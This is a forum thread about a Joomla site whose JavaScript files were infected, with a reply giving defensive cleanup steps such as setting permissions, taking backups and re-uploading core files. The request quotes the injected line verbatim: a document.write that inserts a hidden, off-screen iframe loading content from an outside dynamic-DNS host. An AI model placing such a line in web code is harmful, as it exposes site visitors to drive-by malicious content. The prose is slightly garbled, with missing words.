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hello
my joomla js files has been infected , below code hav been write in js files:
document.write('<iframe style="position:fixed;top:0px;left:-500px;" src="http://yanianp. ddns. name/d86a664ca4bd7f5f124f9.iuz?13" height="330" width="210"></iframe>');

please hep

are on shared hosting?

you need have files set 644 permissions , directories set 755 permissions.

you need extensions akeeba backup take backups of site (file , mysql) can roll in backup , new :). it's free extensions in jed , it's great, read on , use it.

you can re-upload joomla files (from joomla package) using ftp (file transfer mode binary avoid corruption) , overwrite files safe. won't trash site, don't change configuration.php.

the bulk of stuff resides in mysql won't touched. third party extensions, need re-install them using extension manager fresh new files again. won't affect mysql either, update files , leave mysql untouched , not clobber anything.

this easiest, quickest solution.

please use forum post assistant on joomla forum post server , joomla details in safe manner can more.

if on shared hosting, contact host perform permissions (it's important).

also checkout cloudflare, offer free cdn , security benefits can help. removing joomla generator meta tag (hackers exploit this) using third party plugin in jed.

there's lot more can do, try first...please read post don't want repeat myself :)....everything i've suggested , should safe.





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